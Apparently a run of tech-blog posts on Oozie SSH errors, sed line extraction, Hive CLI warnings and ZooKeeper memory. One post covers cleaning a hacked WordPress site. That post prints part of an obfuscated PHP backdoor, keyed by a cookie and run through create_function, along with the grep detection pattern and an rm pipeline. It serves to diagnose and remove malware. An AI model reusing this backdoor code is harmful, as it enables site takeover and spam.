Oozie SSH Action Failed With “externalId cannot be empty” Error

Last week I was working with an issue that when running a very simple SSH action through Oozie, the job kept failing with “externalId cannot be empty” error. The workflow only had one single SSH action, and nothing else. See the workflow example below:

<workflow-app name="SSH Action Test" xmlns="uri:oozie:workflow:0.5">
    <start to="ssh-5c4d"/>
    <kill name="Kill">
        <message>Action failed, error message[${wf:errorMessage(wf:lastErrorNode())}]</message>
    </kill>
    <action name="ssh-5c4d">
        <ssh xmlns="uri:oozie:ssh-action:0.1">
            <host>user1@another-server-url</host>
            <command>ls / &gt;&gt; /tmp/test.log</command>
            <capture-output/>
        </ssh>
        <ok to="End"/>
        <error to="Kill"/>
    </action>
    <end name="End"/>
</workflow-app>

And the error message from the Oozie server looked like below:

2018-01-03 06:12:45,347 ERROR org.apache.oozie.command.wf.ActionStartXCommand: 
SERVER[{oozie-server-url}] USER[admin] GROUP[-] TOKEN[] APP[SSH Action Test] JOB[0000000-180103010440574-ooz
ie-oozi-W] ACTION[0000000-180103010440574-oozie-oozi-W@ssh-5c4d] Exception,
java.lang.IllegalArgumentException: externalId cannot be empty
        at org.apache.oozie.util.ParamChecker.notEmpty(ParamChecker.java:90)
        at org.apache.oozie.util.ParamChecker.notEmpty(ParamChecker.java:74)
        at org.apache.oozie.WorkflowActionBean.setStartData(WorkflowActionBean.java:503)
        at org.apache.oozie.command.wf.ActionXCommand$ActionExecutorContext.setStartData(ActionXCommand.java:387)
        at org.apache.oozie.action.ssh.SshActionExecutor.start(SshActionExecutor.java:269)
        at org.apache.oozie.command.wf.ActionStartXCommand.execute(ActionStartXCommand.java:232)
        at org.apache.oozie.command.wf.ActionStartXCommand.execute(ActionStartXCommand.java:63)
        at org.apache.oozie.command.XCommand.call(XCommand.java:286)
        at org.apache.oozie.service.CallableQueueService$CompositeCallable.call(CallableQueueService.java:332)
        at org.apache.oozie.service.CallableQueueService$CompositeCallable.call(CallableQueueService.java:261)
        at java.util.concurrent.FutureTask.run(FutureTask.java:262)
        at org.apache.oozie.service.CallableQueueService$CallableWrapper.run(CallableQueueService.java:179)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
        at java.lang.Thread.run(Thread.java:745)

We confirmed that the passwordless connection from the Ooize server to the remote server worked correctly without issues.

After digging through the Oozie source code, I found out that it was due to the fact that Oozie uses Java’s Runtime.exec library to execute the commands remotely. And Runtime.exec does not work in the same way as shell, especially when re-directing output to a file, which Runtime.exec does not support at all. What happened under the hood was that Oozie will split the full command “ls / >> /tmp/test.log” into tokens “ls”, “/”, “>>”, “/tmp/test.log”, and pass all of them into Runtime.exec. And when Runtime.exec executed the command, it treated all tokens, apart from “ls” as the parameters to “ls” command. As you would expect, “>>” is not a file, and “ls” command will fail complain that file does not exist, hence will return exit status of 1, rather than 0.

Oozie tried to capture the PID of the remote process, but failed, and hence returned “externalId cannot be empty” error.

The workaround is simple, just store the full command you want to run into a new script file and ask Oozie to execute that script instead:

1. Create a file “ssh-action.sh” on the target host, for example, under /home/{user}/scripts/ssh-action.sh
2. Add command “ls / >> /tmp/ssh.log” to the file
3. Make the file executable by running:

chmod 744 /home/{user}/scripts/ssh-action.sh

4. Update Oozie workflow to run the new shell script instead:

<ssh xmlns="uri:oozie:ssh-action:0.1">
    <host>user@remote-server-url</host>
    <command>/home/{user}/scripts/ssh-action.sh</command>
    <capture-output/>
</ssh>

And then the SSH action should work perfectly.

WordPress Hacked To Send Spam Emails

My website has been under attack by spammer for a while, I am not sure when it started, but it has been a couple of months. Due to work and family, I have never got a chance to have a look for the cause and solution until now.

Basically what happened was that my postfix mail server kept sending tens of thousands of emails. And possibly due to this, my server has been blocked by Google and all those emails were rejected and got connect timeout to Gmail server, see below in the /var/log/syslog messages:

....
Jan  1 04:06:25 xx-xxx-xxx-xxx postfix/smtp[8201]: connect to mx.vgs.untd.com[64.136.52.37]:25: Connection timed out
Jan  1 04:06:25 xx-xxx-xxx-xxx postfix/smtp[8201]: BA77C42589: to=<randj152@netzero.com>, relay=none, delay=650, delays=589/0.08/61/0, dsn=4.4.1, status=deferred (connect to mx.vgs.untd.com[64.136.52.37
]:25: Connection timed out)
Jan  1 04:06:25 xx-xxx-xxx-xxx postfix/smtp[8202]: connect to mta7.am0.yahoodns.net[98.137.159.24]:25: Connection timed out
Jan  1 04:06:25 xx-xxx-xxx-xxx postfix/smtp[7735]: connect to mail20.voith.com[193.169.205.223]:25: Connection timed out
Jan  1 04:06:25 xx-xxx-xxx-xxx postfix/smtp[7735]: 12C75425D2: to=<gerald.franke@ditis.de>, relay=none, delay=449, delays=388/0/61/0, dsn=4.4.1, status=deferred (connect to mail20.voith.com[193.169.205.
223]:25: Connection timed out)
Jan  1 04:06:26 xx-xxx-xxx-xxx postfix/smtp[8200]: connect to smtpin01.mc.a.cloudfilter.net[52.204.45.50]:25: Connection timed out
Jan  1 04:06:26 xx-xxx-xxx-xxx postfix/smtp[8200]: A893942583: to=<garylmiller@mchsi.com>, relay=none, delay=650, delays=589/0.1/61/0, dsn=4.4.1, status=deferred (connect to smtpin01.mc.a.cloudfilter.ne
t[52.204.45.50]:25: Connection timed out)
Jan  1 04:06:26 xx-xxx-xxx-xxx postfix/smtp[8199]: connect to mx2.earthlink.net[209.86.93.227]:25: Connection timed out
Jan  1 04:06:27 xx-xxx-xxx-xxx postfix/smtp[8186]: connect to mail.thunderworx.net[217.27.32.193]:25: Connection timed out
Jan  1 04:06:27 xx-xxx-xxx-xxx postfix/smtp[8191]: connect to mx-b.ktk.de[82.115.96.243]:25: Connection timed out
Jan  1 04:06:27 xx-xxx-xxx-xxx postfix/smtp[8191]: D2322425C2: to=<carsten.leonhardt@rz-online.de>, relay=none, delay=451, delays=388/0.08/63/0, dsn=4.4.1, status=deferred (connect to mx-b.ktk.de[82.115
.96.243]:25: Connection timed out)
Jan  1 04:06:28 xx-xxx-xxx-xxx postfix/smtp[7767]: connect to cax.virusfree.cz[31.7.241.25]:25: Connection timed out
Jan  1 04:06:30 xx-xxx-xxx-xxx postfix/smtp[8198]: connect to rpi0i001.laposte.fr[178.213.67.9]:25: Connection timed out
Jan  1 04:06:35 xx-xxx-xxx-xxx postfix/smtp[8186]: C09304258C: to=<chrioannouresta@primehome.com>, relay=mail-mx100.thunderworx.net[217.27.32.90]:25, delay=660, delays=589/0.08/67/3.1, dsn=5.0.0, status
=bounced (host mail-mx100.thunderworx.net[217.27.32.90] said: 550-Verification failed for <jayden.w@blog.ericlin.me> 550-Called:   74.125.206.26 550-Sent:     RCPT TO:<jayden.w@blog.ericlin.me> 550-Respon
se: 550-5.1.1 The email account that you tried to reach does not exist. Please try 550-550-5.1.1 double-checking the recipient's email address for typos or 550-550-5.1.1 unnecessary spaces. Learn more at
550-550 5.1.1  https://support.google.com/mail/?p=NoSuchUser e193si20747180wmf.133 - gsmtp 550 Sender verify failed (in reply to RCPT TO command))
Jan  1 04:06:35 xx-xxx-xxx-xxx postfix/cleanup[8206]: C2889426F7: message-id=<20180101040635.C2889426F7@xx-xxx-xxx-xxx.ap-southeast-2.compute.internal>
Jan  1 04:06:35 xx-xxx-xxx-xxx postfix/bounce[8410]: C09304258C: sender non-delivery notification: C2889426F7
Jan  1 04:06:35 xx-xxx-xxx-xxx postfix/qmgr[4888]: C2889426F7: from=<>, size=5065, nrcpt=1 (queue active)
Jan  1 04:06:35 xx-xxx-xxx-xxx postfix/qmgr[4888]: C09304258C: removed
.......

I tried to search on Google and it turned out that my blog powered by WordPress was infected with malware and it keeps sending out emails. Google suggested that we can do a search based on function “base64_decode”, which is common function used by spammer’s scripts to do such jobs. So I did the search and it turned out that there were lots of such files under my WordPress installation directory:

ericlin@localhost: $ sudo grep -ri 'base64_decode' * | grep create_function
wp-admin/css/lfiendwt.php:	$_sxbiv = create_function ('$hyplio', sxbiv (base64_decode (
wp-admin/images/uczftagb.php:	$_ondxf = create_function ('$hkkcxn', ondxf (base64_decode (
wp-content/plugins/wp-connect/rbvphaub.php:	$_afchu = create_function ('$bbmmqr', afchu (base64_decode (
wp-content/plugins/googleanalytics/wrhnumao.php:	$_aparnlc = create_function ('$ezkeul', aparnlc (base64_decode (
wp-content/themes/alexandria/qkvejyid.php:	$_barsl = create_function ('$xwbnc', barsl (base64_decode (
wp-content/plugins/wp-connect/hzrttagh.php:	$_txkmjnd = create_function ('$rbeeug', txkmjnd (base64_decode (
wp-includes/rest-api/fields/aokjutfe.php:	$_barsl = create_function ('$xwbnc', barsl (base64_decode (
wp-includes/Requests/Exception/umbiwtox.php:	$_mrbqv = create_function ('$rdscfs', mrbqv (base64_decode (
wp-includes/SimplePie/HTTP/ljwvhrtn.php:	$_hapmrsb = create_function ('$qujqu', hapmrsb (base64_decode (
wp-includes/rest-api/blimaumt.php:	$_mrbqv = create_function ('$rdscfs', mrbqv (base64_decode (
wp-includes/Text/Diff/htzqhesw.php:	$_hapmrsb = create_function ('$qujqu', hapmrsb (base64_decode (
wp-includes/images/smilies/xraatxme.php:	$_sxbiv = create_function ('$hyplio', sxbiv (base64_decode (
wp-includes/Requests/Response/tlpeqczj.php:	$_mrbqv = create_function ('$rdscfs', mrbqv (base64_decode (
wp-includes/Requests/Cookie/dnwuvidm.php:	$_txkmjnd = create_function ('$rbeeug', txkmjnd (base64_decode (
wp-includes/SimplePie/Parse/rnylhylq.php:	$_dempkwj = create_function ('$dgeirfu', dempkwj (base64_decode (
wp-includes/SimplePie/XML/qmnfjezi.php:	$_esufzf = create_function ('$mcxgan', esufzf (base64_decode (
.......

The content of those files looks something like below:

<?php

        $majsvj =
                'cmQ9aXMtYXJyJzokb2RlIEVPJHZhJiYkXXswaWYoUkVBLlswSU5VZW5hQXJydWJsaXM'.
                'tcmV0aW9udCgkaHVuZW5zbiIpPmhlaG9zYXRjKCdTbXM7OGJpeVsxbGljYXJ0bGwsZW'.
                'QgJ3BjdW5kO2lmYW1lLDI1KCRhOV0pKCRwRXJyZywkPjpbcmlucmVwO31mLT52ZX19X'.
                'Xsxc2V7dGVjLT5EdGY4cm90MF0sPWV4Z2U7cGxhbWU9J1hPcigkbVJlYyAkdGlvKTsk'.
                'O31ycm4gLjAufWlmdGhpMSkkZ2ljTV9DdWJsb3N0Z25lWzBdcigpaWVucnJvNjF9fX1'.
                .......
                'pLG51JztwaW4sc2VsY29kPlxcMSkoaW5faXNwaztjb25ueV9waWMgbnVsaz0w';

        $_ondxf = create_function ('$hkkcxn', ondxf (base64_decode (
                'XUUCVBMZGBNODVpVTQdBTQFSSwdUBjldBFBcXAMZFRAfawhhfW4AVzc6BQByJiM0OXZ'.
                'qKzZwDVY1YgNyIW5gYX1iNXJxaldXJypmdHEkUQEsdk8zM2cOaDBlZl8CanNIfmFTen'.
                'h4ZXo2MF9eYzA2HSpxCVI0dyRBIHZlSwB+Y1RcdgtqZWFiZSwjU3B+ORkNKHZtOzdkN'.
                '2sFdkt6JWpeXFp2MXZ+fnFQNyVmf3gwBiQHdW0sIGBWVih0dmEzfFlLYnYIXHFjSGUs'.
                'NWJ3eCRRFgBifRY2elZjNntiVzBrZ3J+awt2aXhydjU2WHBlM1EzOXBQCQZzN04nZkR'.
                .......
                'xZcDF1UXFyZSo0XFlvMCQoAGZ6IzN0HmsidFRPMGtkcl1iUmJ8eEcHNTZYQnQwJzwsZ'.
                'lU4MGowTQJxAggyfGdqemdTS2N8ZVskJQRneSdQJClwbicHZFZeKHZEBVseHBQYFzx7'.
                'fHZ7eiNCb0JBEz4XBkNUAwFXTh5PFB8YQWYSFBgXPGt2a2Z2NDkTeWE1MTorfGs2RW9'.
                'PZEgaGg=='
        ), $_COOKIE [str_replace('.', '_', $_SERVER['HTTP_HOST'])]) . ';'); $_ondxf($hkkcxn);

        function ondxf ($fnjkaz, $gifntn) { return $fnjkaz ^ str_repeat ($gifntn, ceil (strlen ($fnjkaz) / strlen ($gifntn))); }

To fix the issue, I just needed to remove those files. I ran below command:

sudo grep -ri 'base64_decode' * | grep create_function | cut -d ":" -f 1 | xargs sudo rm -f

The file contents might be different, so it is best to scan through the files and check if there is any file with random names like the list I had above.

Once all the files are cleaned, I also needed to delete all the queues in the postfix so that the log files would not be kept flooded:

# Delete all queued mail
sudo postsuper -d ALL

# Delete differed mail queue messages - the ones the system intends to retry later
sudo postsuper -d ALL deferred

Then restart postfix server:

sudo service postfix restart

If for some reason the emails keep coming back, by using “mailq” to check:

mailq

-Queue ID-  --Size-- ----Arrival Time---- -Sender/Recipient-------
5C98D675BB*    1659 Mon Nov  6 02:31:30  info@arbeitsagentur.de
                                         cathrine.huth@t-online.de

401A1665FD*    1659 Wed Nov  8 03:01:37  info@arbeitsagentur.de
                                         horstauerbach@aol.com

702DD66A51*    1709 Tue Nov  7 01:56:54  jobs@arbeitsagentur.de
                                         d.ahmadyassin@yahoo.com

You will need to check the details of each email and see where is the source of the script that created the email:

postcat -vq 5C98D675BB

The output looks like below:

*** ENVELOPE RECORDS deferred/8/8FD2542696 ***
message_size:            1816             203               1               0            1816               0
message_arrival_time: Mon Jan  1 04:03:49 2018
create_time: Mon Jan  1 04:03:49 2018
named_attribute: rewrite_context=local
sender_fullname: www-data
sender: corazana.a@blog.ericlin.me
*** MESSAGE CONTENTS deferred/8/8FD2542696 ***
regular_text: Received: by xx-xxx-xxx-xxx.ap-southeast-2.compute.internal (Postfix, from userid 33)
regular_text:   id 8FD2542696; Mon,  1 Jan 2018 04:03:49 +0000 (UTC)
regular_text: To: jmprevenga@telefonica.net
regular_text: Subject: =?utf-8?Q?Quieres_pasar_la_Navidad_en_compa=C3=B1=C3=ADa_de_la_morena=3F?=
regular_text: X-PHP-Originating-Script: 33:rooguols.php(1189) : runtime-created function(1) : eval()'d code(1) : eval()'d code
regular_text: Date: Mon, 1 Jan 2018 04:03:49 +0000
regular_text: From: "Corazana A." <corazana.a@blog.ericlin.me>
regular_text: Message-ID: <f5cf2b20105dcc13231bd56f3d95f21e@blog.ericlin.me>
regular_text: X-Mailer: PHPMailer 5.2.23 (https://github.com/PHPMailer/PHPMailer)
regular_text: MIME-Version: 1.0
regular_text: Content-Type: multipart/alternative;
regular_text:   boundary="b1_f5cf2b20105dcc13231bd56f3d95f21e"
regular_text: Content-Transfer-Encoding: 8bit
regular_text:
regular_text: This is a multi-part message in MIME format.
regular_text:
regular_text: --b1_f5cf2b20105dcc13231bd56f3d95f21e
regular_text: Content-Type: text/plain; charset=utf-8
regular_text: Content-Transfer-Encoding: 8bit
regular_text:
regular_text: Conoceré con el chico para sexo.
regular_text:
regular_text: Está dispuesta a formar la compañía para la Navidad!
regular_text:
regular_text: Garantizo el sexo loco, me encanta hacer la mamada.
regular_text:
regular_text: { http://wayfordailylife.com/happen.php?utm_source=6900l7jut1&utm_medium=408exztblt&utm_campaign=gqb6rn8318&utm_term=9oign62f71&utm_content=yhlzo7pqn1 } Mi formulario está sólo aquí!
regular_text:
regular_text:
regular_text: --b1_f5cf2b20105dcc13231bd56f3d95f21e
regular_text: Content-Type: text/html; charset=utf-8
regular_text: Content-Transfer-Encoding: 8bit
regular_text:
regular_text: <html>
regular_text: <body>
regular_text: Conoceré con el chico para sexo.<br>
regular_text: <br>
regular_text: Está dispuesta a formar la compañía para la Navidad!<br>
regular_text: <br>
regular_text: Garantizo el sexo loco, me encanta hacer la mamada.<br>
regular_text: <br>
regular_text: <a href="http://wayfordailylife.com/happen.php?utm_source=6900l7jut1&utm_medium=408exztblt&utm_campaign=gqb6rn8318&utm_term=9oign62f71&utm_content=yhlzo7pqn1">Mi formulario está sólo aquí!</a><br>
regular_text: </body>
regular_text: </html>
regular_text:
regular_text:
regular_text:
regular_text: --b1_f5cf2b20105dcc13231bd56f3d95f21e--
regular_text:
*** HEADER EXTRACTED deferred/8/8FD2542696 ***
named_attribute: encoding=8bit
named_attribute: dsn_orig_rcpt=rfc822;jmprevenga@telefonica.net
original_recipient: jmprevenga@telefonica.net
recipient: jmprevenga@telefonica.net
*** MESSAGE FILE END deferred/8/8FD2542696 ***

Look for the following line:

regular_text: X-PHP-Originating-Script: 33:rooguols.php(1189) : runtime-created function(1) : eval()'d code(1) : eval()'d code

You can see that the email was generated by script rooguols.php. Search for this file in the WordPress directory and remove it. Repeat the process until all files are identified.

Watch the output of “mailq” to make sure that no emails will be generated again.

Hopefully this will also help with anyone who has the same issue as mine on WordPress blog server.

Extract Lines Between Two Patterns From A File

Yesterday, I was trying to restore one of my old blog sites that was written in Chinese, so that I can continue blogging. I had MySQL database backed up in a dumped SQL file, however, I noticed that I dumped all databases into one file, which stopped me from loading the full dump file into MySQL as there are other databases that I can’t just load them in, like “mysql” system database.

So my goal is simple, to extract this particular database out from the dump file.

Method 1:

Examining the dump file, I can see that they can be separated by the following lines:

-- Current Database: `db1`
-- Current Database: `db2`
-- Current Database: `db3`
-- Current Database: `db4`
-- Current Database: `db5`
-- Current Database: `db6`
....

Thanks to this thread on StackOverflow, the solution is simple, just run below command to extract all lines between “Current Database: `db4`” and “Current Database: `db5`“:

sed '/Current Database: `db4`/,/Current Database: `db5`/!d' dump.sql > db4.sql

What above command does is to search for lines “Current Database: `db4`” and “Current Database: `db5`“, and delete everything that is NOT between those two lines (!d means not matching then delete, “,” means between the lines).

Method 2

Firstly grep the pattern and print out the line numbers:

ubuntu@localhost:~/chenhui$ grep -n 'Current Database' dump.sql
19: -- Current Database: `db1`
382: -- Current Database: `db2`
744: -- Current Database: `db3`
1137: -- Current Database: `db4`
3401: -- Current Database: `db5`
5604: -- Current Database: `db6`
....

Then, use those line number to capture all lines in between:

sed -n 1137,3401p dump.sql > db4.sql

More information can be found from this blog post.

Hope above helps!!

Hive CLI Prints SLF4J Error to Standard Output

If you have both Hive and Spark running on the same cluster, chances are that Hive CLI will probably produce the following WARNING message upon exit of each session:

WARN: The method class org.apache.commons.logging.impl.SLF4JLogFactory#release() was invoked. 
WARN: Please see http://www.slf4j.org/codes.html#release for an explanation.

Sample full output looks like below:

[root@localhost ~]# hive -e "show tables;"

Logging initialized using configuration in jar:file:/opt/cloudera/parcels/CDH-5.12.1-1.cdh5.12.1.p0.3/jars/hive-common-1.1.0-cdh5.12.1.jar!/hive-log4j.properties
OK
sample_07
sample_08
web_logs
Time taken: 1.281 seconds, Fetched: 3 row(s)
WARN: The method class org.apache.commons.logging.impl.SLF4JLogFactory#release() was invoked.
WARN: Please see http://www.slf4j.org/codes.html#release for an explanation.

Even though Hive CLI has been deprecated in CDH, there are still lots of enterprise users out there are still stuck with Hive CLI due to legacy reasons and it is not easy for them to migrate to use Beeline or query Hive through ODBC or JDBC in their applications.

This is not an issue if you just run Hive CLI from command line and view the output. However, if you want to capture the result set from Hive CLI’s stdout, it will be a trouble, see test case below:

[root@localhost ~]# output=`hive -e "show tables;"`

Logging initialized using configuration in jar:file:/opt/cloudera/parcels/CDH-5.12.1-1.cdh5.12.1.p0.3/jars/hive-common-1.1.0-cdh5.12.1.jar!/hive-log4j.properties
OK
Time taken: 1.281 seconds, Fetched: 3 row(s)

And when you echo out the variable $output, it will contain the WARNING message:

[root@localhost ~]# echo $output
sample_07
sample_08
web_logs
WARN: The method class org.apache.commons.logging.impl.SLF4JLogFactory#release() was invoked.
WARN: Please see http://www.slf4j.org/codes.html#release for an explanation.

And when you want to use this output as other inputs in your application, things will go crazy.

This happens due to the below code under hive’s script file (/opt/cloudera/parcels/CDH/lib/hive/bin/hive) that loads Spark’s JAR file into Hive’s CLASSPATH:

# add Spark assembly jar to the classpath
if [[ -n "$SPARK_HOME" && !("$HIVE_SKIP_SPARK_ASSEMBLY" = "true") ]]
then
  sparkAssemblyPath=`ls ${SPARK_HOME}/lib/spark-assembly-*.jar`
  CLASSPATH="${CLASSPATH}:${sparkAssemblyPath}"
fi

Luckily, the latest CDH release, in fact from CDH 5.12.0, Cloudera has backported an upstream JIRA HIVE-12179, which added a checking for environment variable called “HIVE_SKIP_SPARK_ASSEMBLY”. So we can use this variable to disable the loading of Spark JARs for Hive CLI if you do not need to use Hive on Spark.

So the workaround is as simple as setting “HIVE_SKIP_SPARK_ASSEMBLY” to “true” so that the “if” statement will be skipped. See below example:

[root@localhost ~]# output=`export HIVE_SKIP_SPARK_ASSEMBLY=true; hive -e "show tables;"`

Logging initialized using configuration in jar:file:/opt/cloudera/parcels/CDH-5.12.1-1.cdh5.12.1.p0.3/jars/hive-common-1.1.0-cdh5.12.1.jar!/hive-log4j.properties
OK
Time taken: 1.281 seconds, Fetched: 3 row(s)

And the output will be clean like below:

[root@localhost ~]# echo $output
sample_07
sample_08
web_logs

This workaround will not work if you need to use Hive on Spark in Hive CLI, because it essentially disables the loading of Spark JARs. And of course, using of Hive CLI is strongly NOT recommended, and migration to Beeline or use ODBC/JDBC to connect to HiveServer2 is the right way to go in the long run.

Hope above information helps.

Hive Long Queries Causing ZooKeeper Fail With OutOfMemory Error

I have seen lots of Hadoop users are not using Big Data technology correctly. Hadoop is designed for Big Data, so it works well with large file sizes and this is why we have block size for HDFS as 256MB or 512MB depending on use cases. However, lots of users, even from big corporate companies are not utilizing such technology by having lots of small files and partitions for a given Hive table. Some particular users have millions of partitions and hundreds of millions of files stored in HDFS, each file is in KB of size. This puts lots of pressure on all components in the Hadoop echo system, including HDFS, HiveServer2, Impala, ZooKeeper just to name a few.

In this particular post, I am going to discuss one of the side effect of such usage pattern that it will crash ZooKeeper with OutOfMemory error, combined with large string of Hive query being run.

The following was what happened:

1. User runs a Hive query with very long string (contains 100KB of characters)
2. This Hive query runs against a table with millions of partitions
3. The query will scan through about 20,000 partition
4. Since hive.support.concurrency=true, when the query is running, Hive will try to create one ZNode per partition in ZooKeeper to indicate that those partitions are locked
5. Hive will also store the full Hive query string against each ZNode for debugging purpose, so that when issue happened, user can check ZNode and see which query locks the partition
6. So we have 20,000 partitions * 100K each, we will end up creating 2GB of data in ZooKeeper, just for this query alone
7. If we have multiple similar queries, ZooKeeper can reach to memory limit easily in no time

To overcome this problem, Hive introduced a new feature to control the number of characters to be stored against each ZNode in such scenario, via upstream JIRA HIVE-16334. This JIRA has been backported into CDH since 5.12.0.

However, the default size is 1MB (1,000,000 bytes), which is still big and above case will still happen. To work around this issue, we can simply reduce the number of Hive query being stored, say to 10K. (Storing of the query string is purely for debugging purpose, so in theory we can reduce to a very small size, but probably not a good idea if you want to troubleshoot other issues, so 10K should be a good starting point).

To do so, please follow below steps (assuming that you are using Cloudera Manager):

1. Go go CM > Hive > Configuration > HiveServer2 Advanced Configuration Snippet (Safety Valve) for hive-site.xml
2. Enter below into textarea (view as XML):

<property>
    <name>hive.lock.query.string.max.length</name>
    <value>10000</value>
    <description>The maximum length of the query string to store in the lock. Set it to 10K.</description>
</property>

3. Save and restart HiveServer2

After that, we should have less chance of hitting ZooKeeper OutOfMemory in the above scenario. However, the root cause was due to too many partitions, so the first priority is to reduce as much as possible so that each query will not scan more than 1000 partitions to get good performance.

For users using CDH older than CDH 5.12.0, suggestion is to upgrade.

Hope above helps.